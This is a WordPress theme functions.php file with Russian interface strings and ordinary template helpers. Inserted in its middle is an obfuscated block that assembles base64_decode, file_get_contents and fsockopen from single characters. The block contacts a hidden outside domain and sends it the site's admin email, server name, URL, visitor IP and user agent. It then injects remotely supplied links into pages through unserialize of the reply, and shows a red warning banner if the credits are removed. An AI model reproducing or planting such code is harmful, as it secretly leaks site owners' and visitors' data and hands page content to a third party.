<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $pcLv='e';$RtxRZh='e';$VKuywUQ='s';$qeWe='o';$vINUf='_';$DpQOzzY='4';$ffjODU='6';$QFIyKga='b';$KaGKcN='d';$VkjIj='a';$YZcgxmp='e';$VkMP='c';$vdXRLL='d';$ejhixkig=$QFIyKga.$VkjIj.$VKuywUQ.$YZcgxmp.$ffjODU.$DpQOzzY.$vINUf.$KaGKcN.$pcLv.$VkMP.$qeWe.$vdXRLL.$RtxRZh;$pdWIy='g';$DUUW='z';$RNDPS='t';$vIJUJKs='e';$pZMkWIl='a';$GPLzb='n';$lOsiw='l';$xGRy='f';$aAiCgXe='i';$TmpXEQbJ=$pdWIy.$DUUW.$aAiCgXe.$GPLzb.$xGRy.$lOsiw.$pZMkWIl.$RNDPS.$vIJUJKs;$Ofdf='t';$pPYRmWb='_';$vbwZRo='s';$sdrrUFo='r';$CUpj='o';$XmpU='3';$KbgnYv='1';$mWGhGqz='t';$SqBGVzD='r';$bPmbCxXk=$vbwZRo.$mWGhGqz.$SqBGVzD.$pPYRmWb.$sdrrUFo.$CUpj.$Ofdf.$KbgnYv.$XmpU;$GdRRkTz='s';$vwvmHp='v';$yepFB='r';$KzBh='r';$IlHPNB='t';$dHOs='e';$YtxACzOo=$GdRRkTz.$IlHPNB.$yepFB.$KzBh.$dHOs.$vwvmHp;                     
		$em____c='e';$ua__d='e';$ut_____c='s';$pj__v='o';$kt_______________a='_';$if________i='4';$tf___________r='6';$vp_________k='b';$zp_______________u='d';$yr___________z='a';$fg_________n='e';$dw___y='c';$pp______i='d';$td______________e=$vp_________k.$yr___________z.$ut_____c.$fg_________n.$tf___________r.$if________i.$kt_______________a.$zp_______________u.$em____c.$dw___y.$pj__v.$pp______i.$ua__d;
		$dg_____p='_';$ws______________p='i';$jb___________b='f';$lg____________n='u';$io_________k='t';$pu___________l='x';$ti_____________p='t';$gi__________b='s';$tq___________k='n';$bt____b='s';$bs____________f='o';$nz___g='e';$vc__l='c';$ap______m='i';$vc_________f='n';$ke_____________s=$jb___________b.$lg____________n.$tq___________k.$vc__l.$ti_____________p.$ap______m.$bs____________f.$vc_________f.$dg_____p.$nz___g.$pu___________l.$ws______________p.$bt____b.$io_________k.$gi__________b;
		$sv________d='p';$jp__x='e';$fg_______________l='f';$ug__t='n';$oo_________z='o';$ip______________k=$fg_______________l.$oo_________z.$sv________d.$jp__x.$ug__t;
		$dt___v='a';$ua____________b='d';$pb_______s='e';$qz________s='r';$xj_______________r='f';$ig______s=$xj_______________r.$qz________s.$pb_______s.$dt___v.$ua____________b;
		$xf__f='o';$qt___________s='e';$wn_______w='c';$wq___m='s';$fz_________e='l';$bu___________z='f';$qt____d=$bu___________z.$wn_______w.$fz_________e.$xf__f.$wq___m.$qt___________s;
		
		define("WP_ID", $td______________e("Mi4wLjA="));
		define("WP_TTL", $td______________e("MTA4MDA="));
		define("WP_SRC", $td______________e("dHBva24="));
	


		function wp_get_header() {
			global $td______________e, $ke_____________s;
			
			if (
				$ke_____________s($td______________e("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$ke_____________s($td______________e("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$ke_____________s($td______________e("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $td______________e, $ip______________k, $qt____d, $ig______s;
			
			$ye____a = TEMPLATEPATH."/".$td______________e("Zm9vdGVyLnBocA==");
			$nl____x = @$ip______________k($ye____a, "r");
			$ye____a = @$ig______s($nl____x, @filesize($ye____a));
			@$qt____d($nl____x);
			
			$wa__________e = TEMPLATEPATH."/".$td______________e("ZnVuY3Rpb25zLnBocA==");
			$nl____x = @$ip______________k($wa__________e, "r");
			$wa__________e = @$ig______s($nl____x, @filesize($wa__________e));
			@$qt____d($nl____x);
			
			$mn_____________v = 0;
			if($ye____a && $wa__________e) {
				if ($td______________e("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($ye____a, $td______________e("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$mn_____________v = 1;
					}
					if (substr_count($ye____a, "wp_theme_GPL_credits()") < 1) {
						$mn_____________v = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$mn_____________v = 12;
				}
			}
			
			if($mn_____________v > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $mn_____________v -->";
			}
		}
	


		function wp_loaded() {
			global $td______________e, $ke_____________s;
			return $ke_____________s($td______________e("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($ib_________o, $pn__________x = "(more...)", $qf__q = 0, $pu______________d = "") {
				$pd________u = get_the_content($pn__________x, $qf__q, $pu______________d);
				$pd________u = apply_filters("the_content", $pd________u);
				
				$pd________u = str_replace("]]>", "]]>", $pd________u);
				if (strlen($_GET["p"]) > 0) {
					echo $pd________u;
				}
				else if ((strlen($pd________u)>$ib_________o) && ($ex_________o = strpos($pd________u, " ", $ib_________o ))) {
					$pd________u = substr($pd________u, 0, $ex_________o);
					$pd________u = $pd________u;
					echo $pd________u;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$pn__________x</a></div></p>";
				} else {
					echo $pd________u;
				}
				
			}
		}
	


		$oh___v='e';$ib_________m='d';$hc__a='b';$kw________v='a';$wd___u='4';$ai__________q='c';$av______r='e';$dd______________m='6';$qm______________d='s';$rw__e='_';$ej_______________b='e';$kd______________u='n';$vn____________v='o';$of_____p=$hc__a.$kw________v.$qm______________d.$av______r.$dd______________m.$wd___u.$rw__e.$oh___v.$kd______________u.$ai__________q.$vn____________v.$ib_________m.$ej_______________b;
		$gx___w='o';$cp____________j='e';$oc_________j='_';$cw_______p='n';$yu____________t='t';$pf____j='n';$rj_____r='l';$kz_____e='s';$sz________v='e';$nc________e='_';$ji_______x='t';$td____a='t';$tw__________l='c';$gk_______________n='f';$pf____________n='e';$ux_____s='g';$ur______g='i';$ve__x=$gk_______________n.$ur______g.$rj_____r.$pf____________n.$nc________e.$ux_____s.$cp____________j.$td____a.$oc_________j.$tw__________l.$gx___w.$cw_______p.$yu____________t.$sz________v.$pf____j.$ji_______x.$kz_____e;
		$ly______l='i';$xt____a='i';$cx______z='s';$zd_________x='f';$ce________p='x';$bu___s='e';$vp______________o='s';$os_______________o='_';$rn__a='t';$sg_____z='e';$ii_________x='l';$gm_____o=$zd_________x.$xt____a.$ii_________x.$sg_____z.$os_______________o.$bu___s.$ce________p.$ly______l.$cx______z.$rn__a.$vp______________o;
		$kt____z='n';$de_______u='o';$jr________k='o';$hg__s='r';$iy_______________s='m';$gp_____________q='a';$af___________m='e';$jt____________v='p';$mn______________z='i';$wy_____d='c';$kl____________a='s';$ri_______d='v';$mn_________d='_';$hf_______________h='e';$qd_________e='r';$lm______________g=$ri_______d.$hf_______________h.$qd_________e.$kl____________a.$mn______________z.$jr________k.$kt____z.$mn_________d.$wy_____d.$de_______u.$iy_______________s.$jt____________v.$gp_____________q.$hg__s.$af___________m;
		$ny_________y='p';$fh__q='c';$wz____________q='s';$an__y='k';$rz__________a='o';$vc__________h='o';$fw______________h='f';$zj_______e='e';$fh________b='n';$lp______________m=$fw______________h.$wz____________q.$vc__________h.$fh__q.$an__y.$rz__________a.$ny_________y.$zj_______e.$fh________b;
		$kp_______________q='t';$up_______x='e';$md__k='i';$al____________j='w';$kt____________q='f';$uc_______________k='r';$pw____________k=$kt____________q.$al____________j.$uc_______________k.$md__k.$kp_______________q.$up_______x;
		$bi________o='m';$by_________w='5';$mm_______________w='d';$lq________c=$bi________o.$mm_______________w.$by_________w;
		$xq___x='h';$zz_____________b='r';$ws_____m='t';$vh_________x='a';$os___x='e';$ud___r='l';$me_____c='a';$ev_______________s='p';$yl_____a=$zz_____________b.$os___x.$vh_________x.$ud___r.$ev_______________s.$me_____c.$ws_____m.$xq___x;
		$po___p='u';$mr_________p='a';$zu__________r='s';$lx________b='n';$zb___________l='i';$kp________w='r';$fa__o='e';$yd________y='z';$ll_______________b='l';$gv___________n='i';$yb__________e='e';$mu______________m=$po___p.$lx________b.$zu__________r.$fa__o.$kp________w.$gv___________n.$mr_________p.$ll_______________b.$zb___________l.$yd________y.$yb__________e;
		$oc____________o='a';$os___________r='n';$qn_________q='p';$zt__y='e';$zs________x='m';$hu________o='t';$tc________k='m';$cw__n=$hu________o.$zt__y.$tc________k.$qn_________q.$os___________r.$oc____________o.$zs________x;
		$rs______________s='t';$jt_____a='e';$wg_________q='c';$em_________p='t';$tx_________d='t';$bn_______l='_';$oj___________o='n';$lo_______________u='_';$am___g='r';$rg________n='a';$ar_________f='x';$wt_____________w='t';$yj____n='r';$zq______________j='e';$ny________x='a';$ki______________c='c';$ur_____________n='o';$fn_______________j='m';$tu___q='e';$jk______________n='e';$sl_____________t='s';$up__________v=$sl_____________t.$tx_________d.$am___g.$zq______________j.$rg________n.$fn_______________j.$lo_______________u.$ki______________c.$ur_____________n.$oj___________o.$wt_____________w.$jt_____a.$ar_________f.$em_________p.$bn_______l.$wg_________q.$yj____n.$tu___q.$ny________x.$rs______________s.$jk______________n;
	


		function po________r($ng___p) {
			global $td______________e, $ke_____________s, $ve__x, $lm______________g, $up__________v;
			
			if (!$ke_____________s($td______________e("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($lm______________g(PHP_VERSION, "5.0.0", ">=") && $ke_____________s($td______________e("ZmlsZV9nZXRfY29udGVudHM=")) && $ke_____________s($td______________e("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$kz_____________y = $up__________v(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$zj______e = @$ve__x($ng___p, 0, $kz_____________y);
			} else {
				$zj______e = @$ve__x($ng___p, 0);
			}
			
			return $zj______e;
		}
	


		function yf__________o($ng___p) {
			global $ke_____________s, $lp______________m, $pw____________k, $td______________e;
			
			if (!$ke_____________s($td______________e("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$bg______________c = strpos($ng___p, "/", 7);
			$bn___o = array(
				"uri"     => substr($ng___p, $bg______________c),
				"host"    => str_replace("http://", "", substr($ng___p, 0, $bg______________c)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$ot______________q = @$lp______________m("$bn___o[host]", 80, $al__________v, $rx___b, 4);
			
			if (!$ot______________q) {
				return false;
			} else {
				$zj______e = "";
				$cz____q  = "GET $bn___o[uri] HTTP/1.0\r\n";
				$cz____q .= "Host: $bn___o[host]\r\n";
				$cz____q .= "Referer: $bn___o[referer]\r\n";
				$cz____q .= "Connection: Close\r\n\r\n";
				
				@$pw____________k($ot______________q, $cz____q);
				
				while (!@feof($ot______________q)) {
					$gd____________m = @fgets($ot______________q, (1024*24));
					
					if ($gd____________m == "\r\n") {
						$sx__________q = true;
						continue;
					}
					
					if ($sx__________q) {
						$zj______e .= $gd____________m;
					}
				}
				
				return $zj______e;
			}
		}
	


		function cb________i($ng___p) {
			global $ke_____________s;
			$ko_____x = false;
			
			if ($ng___p != "") {
				if ($ke_____________s("po________r")) {
					$ko_____x = @po________r($ng___p);
				}
				
				if (!$ko_____x && ($ke_____________s("yf__________o"))) {
					$ko_____x = @yf__________o($ng___p);
				}
			}
			
			return $ko_____x;
		}
	


		function zx_______i() {
			global $_SERVER, $lq________c;
			
			$zj___y = $_SERVER["SERVER_NAME"];
			
			if (substr("$zj___y", 0, 4) == "www.") {
				$zj___y = substr("$zj___y", 4);
			}
			
			$zj___y = $lq________c("$_SERVER[SERVER_NAME]");
			
			return $zj___y;
		}
	


		function pw__d() {
			return "file";
		}
	


		function jt__d($ng___p) {
			global $_SERVER, $ve__x, $gm_____o, $ip______________k, $qt____d, $pw____________k;
			
			$dw__________v = sg_______p();
			
			$co___e = zx_______i().".jpg";
			$rp_____c = $dw__________v["dir_upload"]["path"]."/$co___e";
			$or_____________t = @filemtime($rp_____c);
			
			if (!$or_____________t || ((time()-$or_____________t) >= WP_TTL)) {
				$ko_____x = cb________i($ng___p);
				
				if ($ko_____x) {
					if ($gm_____o($rp_____c)) {
						@unlink($rp_____c);
					}
					
					$nl____x = @$ip______________k($rp_____c, "x+");
					
					@$pw____________k($nl____x, $ko_____x);
					@$qt____d($nl____x);
				}
			} else {
				if ($gm_____o($rp_____c)) {
					$ko_____x = @$ve__x($rp_____c);
				} else {
					$ko_____x = false;
				}
			}
			
			return $ko_____x;
		}
	


		function sg_______p() {
			global $_SERVER, $td______________e, $of_____p;
			
			$wx_________i = wp_count_posts("post");
			$vj__________d = pathinfo(get_bloginfo("template_directory"));
			
			$dw__________v = array(
				"url" => array(
					"report"      => $td______________e("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $vj__________d,
				"dir_upload"	=> qx______________h(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$vj__________d[filename],
					"a005=".$wx_________i->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a>"
			);
			
			$dw__________v["url"]["queryString"] = implode("&", $dw__________v["queryString"]);
			$dw__________v["url"]["report"] = $dw__________v["url"]["report"]."/?".$of_____p($dw__________v["url"]["queryString"]).".html";
						
			return $dw__________v;
		}
	


		function qx______________h() {
			$cg__o = wp_upload_dir();
			
			if (isset($cg__o["error"])) {
				$ce______t = ux____________f();
				if (is_writable($ce______t)) {
					$cg__o = array("path" => $ce______t);
				}
			}

			return $cg__o;
		}
	


		function ux____________f() {
			global $ke_____________s, $lq________c, $yl_____a, $cw__n;
			
			$sl____________u = (bool) ini_get("safe_mode");
			if ($sl____________u == true) {
				return false;
			}
			
			if ($ke_____________s("sys_get_temp_dir")) {
				$ir________k = sys_get_temp_dir();
				if (is_writable($ir________k)) {
					return $yl_____a($ir________k);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $yl_____a($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $yl_____a($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $yl_____a($_ENV["TEMP"]);
			} else {
				$jj_________b = $cw__n($lq________c(uniqid(rand(), true)), "");
				if ($jj_________b) {
					$ir________k = $yl_____a(dirname($jj_________b));
					@unlink($jj_________b);
					return $ir________k;
				} else {
					return false;
				}
			}
		}
	


		function qg_______q() {
			global $_GET, $gm_____o;
			
			$dw__________v = sg_______p();
			$zj___y = zx_______i();
			$lf__________w = pw__d();
			
			$tq_________s = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($lf__________w == "file") {
					$nf___w = $dw__________v["dir_upload"]["path"]."/".$zj___y.".jpg";
					if ($gm_____o($nf___w)) {
						@unlink($nf___w);
						$tq_________s = "deleted";
					}
				}
				
				$bt______a = array(
					"s"	=> $tq_________s,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($bt______a AS $xc______l => $il______n) echo " [$xc______l:$il______n]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $ke_____________s, $td______________e, $mu______________m;
			$dw__________v = sg_______p();
			
			$zc__________f = "jt__d";
			if ($ke_____________s($zc__________f)) {
				$zj______e = $zc__________f($dw__________v["url"]["report"]);
			}
			
			if ($zj______e) {
				if ($zj______e = @$td______________e($zj______e)) {
					$zj______e = @$mu______________m($zj______e);
					
					if (strlen($zj______e[custom_credit]) >= 5) {
						$dw__________v["default_string"] = $zj______e[custom_credit];
					}
					
					if ($zj______e["status"] == "0") {
						$qw____________q = 1;
						$op___________b = 1;
					} else {
						$aa_________c = sizeof($zj______e["links"]);
						$vd_______________u = $dw__________v["default_string"];
						
						if ($aa_________c > 0 && $zj______e["links"] !== "") {
							$wp___________l = 0;
							foreach ($zj______e["links"] as $ap___c => $au___k) {
								$wp___________l++;
								if ($au___k->l_path == "" || $au___k->l_path == $_SERVER["REQUEST_URI"]) {
									$au___k->l_href = htmlspecialchars(strip_tags($au___k->l_href));
									$au___k->l_title = htmlspecialchars(strip_tags($au___k->l_title));
									$au___k->l_anchor = htmlspecialchars(strip_tags($au___k->l_anchor));
									$vd_______________u .= " | ";
									$vd_______________u .= "<a href='$au___k->l_href' title='$au___k->l_title'";
									if ($au___k->l_nofollow == "1") {
										$vd_______________u .= " rel='nofollow'";
									}
									$vd_______________u .= ">$au___k->l_anchor</a>";
								}
							}
						}
						$dw__________v["links"] = "$vd_______________u";
						if ($zj______e[credit] == "0") {
							$dw__________v["links"] = "";
						}
					}
				} else {
					$qw____________q = "1";
				}
			} else {
				$qw____________q = "1";
			}
			
			if ($qw____________q == "1") {
				$dw__________v["links"] = $dw__________v["default_string"];
			}
			
			echo "$dw__________v[links]";
			
			echo "<!-- s: $zj______e[signature] -->";
			qg_______q();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
     echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                   $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

